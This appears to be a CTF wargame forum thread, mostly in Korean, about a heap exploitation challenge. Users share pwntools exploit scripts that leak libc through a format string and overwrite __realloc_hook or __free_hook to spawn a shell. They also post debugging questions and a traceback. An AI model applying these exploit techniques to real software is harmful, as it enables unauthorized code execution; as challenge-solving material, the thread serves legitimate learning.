from pwn import * p = process('./link') #p = remote('host3.dreamhack.games', 22516) libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so') #context.log_level = 'debug' libc_start_main_offset = libc.symbols['__libc_start_main'] __realloc_hook_offset = libc.symbols['__realloc_hook'] p.sendafter(': ', '%11$p') libc_start_main = int(p.recv(14), 16)-231 lb = libc_start_main - libc_start_main_offset one_gadget = p64(lb + 0xe54f7) __realloc_hook = lb + __realloc_hook_offset __realloc_hook_ini = __realloc_hook - 3486840 print(one_gadget) def add_user(object_n, name, phone, etc): p.sendlineafter('menu: ', '1') p.sendlineafter('object number: ', object_n) p.sendafter('name: ', name) p.sendafter('phone number: ', phone) p.sendafter('etc: ', etc) def edit_user(object_n, new_object_n, game, phone, etc): p.sendlineafter('menu: ', '4') p.sendlineafter('object number: ', object_n) p.sendlineafter('new object number: ', new_object_n) p.sendafter('new name: ', game) p.sendafter('new phone number: ', phone) p.sendafter('new etc: ', etc) add_user('1','1','1','1') add_user('2','1','1','1') edit_user('1', '1', 'A'0x10, 'A'0x10, b'A'*0x100+p64(__realloc_hook)) edit_user(str(__realloc_hook_ini),'1', one_gadget,'A','A') p.sendlineafter('menu: ', '1') p.interactive() 로컬에선 되는데 리모트에서는 Got EOF while reading in interactive 가 아니라 그냥 파이썬 코드오류로 뜨네요. 뭘고쳐야될까요?

문제의 오타를 찾아내려 코드들을 살펴보는데, main에서 buf를 그대로 출력하므로 약간의 fsb가 가능하다. delete에서 list가 2개 이상 있을 때 다음 차례의 list를 검사하기 때문에, list가 2개 이상 있을 때 첫 번째 list는 확인하지 않는다. 아무리 찾아봐도 이 정도밖에 찾지 못했습니다. 혹시 제가 찾은 것들이 올바른 방향이 맞나요?

로컬 연결 하면 오류 뜨면서 안되는데..

I saw it has bof on etc when adding and i am able to overwrite stuff but when i do bof i get sigseg bc I overwrite head ptr.Hint pls.Also i know it inclused \a0 byte after input and with that I'm supossed to overwrite head ptr to leak it but i got stuck :(

로컬에서는 되다가 리모트에서 [*] Got EOF while reading in interactive 이렇게 뜨는 로되리안은 자주 보고 이유도 알겠는데 로컬에서는 잘되는데 리모트에서는 아예 코드자체에서 에러가 뜨는 이런 오류는 원인이 뭔가요 File "link.py", line 39, in <module> edit_user(str(__realloc_hook_ini),'1', one_gadget,'A','A') File "link.py", line 30, in edit_user p.sendlineafter('new object number: ', new_object_n) File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 822, in sendlineafter res = self.recvuntil(delim, timeout=timeout) File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 333, in recvuntil res = self.recv(timeout=self.timeout) File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 105, in recv return self._recv(numb, timeout) or b'' File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 183, in _recv if not self.buffer and not self._fillbuffer(timeout): File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 154, in _fillbuffer data = self.recv_raw(self.buffer.get_fill_size()) File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/sock.py", line 56, in recv_raw raise EOFError `

푸는 도중에 도저히 이해가 안되는 부분이 있습니다. image.png 이렇게 __free_hook 주소에다가 system 함수를 집어넣고, free시킬 object_number에 binsh 주소를 넣은 뒤에 free를 시켜봤는데 image.png 쉘이 실행되지 않고 그냥 정상적으로 free가 되는 것을 확인했습니다. 제 생각으로는 system 함수가 실행되어야 할 것 같은데 왜 안되는 건지 모르겠습니다. 아래는 제가 시도했던 코드입니다. from pwn import * p = process('./linked_list') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def add(object_number): p.sendlineafter(': ', '1') p.sendlineafter(': ', str(object_number)) for a in range(3): p.sendlineafter(': ', '1') def delete(object_number): p.sendlineafter(': ', '2') p.sendlineafter(': ', str(object_number)) def show(object_number): p.sendlineafter(': ', '3') p.sendlineafter(': ', str(object_number)) def edit(object_number, new_object_number, payload): p.sendlineafter(': ', '4') p.sendlineafter(': ', str(object_number)) p.sendlineafter(': ', str(new_object_number)) for a in range(2): p.sendlineafter(': ', str(0)) p.sendlineafter(': ', payload) #Leak libc_base & free_hook p.sendlineafter(': ', '%3$p') libc_base = int(p.recvn(14).decode(), 16) - 0x1036dd free_hook = libc_base + libc.symbols['__free_hook'] system = libc_base + libc.symbols['system'] bin_sh = libc_base + 0x1a7e43 add(1) add(2) edit(1, 1, b'b'*0x100 + p64(free_hook)) edit(0, system, str(2)) add(bin_sh) p.interactive() 도와주세요..ㅠㅠ